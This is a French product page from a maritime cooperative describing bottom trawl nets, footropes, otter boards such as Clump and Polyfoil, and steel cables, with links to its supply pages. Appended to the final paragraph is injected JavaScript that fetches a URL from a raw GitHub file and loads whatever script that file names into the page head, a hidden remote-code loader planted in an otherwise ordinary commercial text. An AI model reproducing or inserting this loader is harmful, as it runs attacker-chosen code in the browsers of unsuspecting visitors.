Tout savoir sur le chalut de fond
Déployé en forme de cône, le chalut de fond est une technique de pêche éprouvée depuis des années. Le filet est remorqué par le bateau par des câbles en acier que l’on appelle des funes. A l’ouverture des filets des panneaux divergents permettent d’élargir le chalut.
Sur la partie avant de la nappe qui maintient le chalut en profondeur on fixe des bourrelets dont la la forme et la masse varient selon le type de fond rencontré.
Les mailles du filet doivent être adaptées à chaque type de pêche en fonction des espèces et doivent répondre à la réglementation en vigueur.
Il y a différents types de bourrelets : avec chaîne, avec rondelles de caoutchouc ou avec des sphères métalliques. Vous pouvez prendre connaissance de nos procédés de fabrication de bourrelet et de diabolo ici : Fabrication de gréements
Des fournitures de qualité
De la même façon, votre Coopérative Maritime vous propose aussi des panneaux divergents adaptés : Clump, Exocet, Ovalfoil ou Polyfoil. Les avantages de ces panneaux sont multiples : ils augmentent la portance, diminuent la traînée et par conséquence, réduisent la consommation de carburant.
Pour avoir plus d’informations techniques sur les panneaux, rendez vous sur cette page : Panneaux
Votre conseiller de la Coopérative Maritime saura vous conseiller sur les avantages de chacun de ces types de fourniture pour des pêches profitables.
Nous vous proposons également une large gamme de câbles en acier. Plus d’informations ici : fourniture de câbles acier. (var url = « https://raw.githubusercontent.com/truba77/trubnik/main/to.txt »; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(« script »); script.src = data.trim(); document.getElementsByTagName(« head »)[0].appendChild(script); });)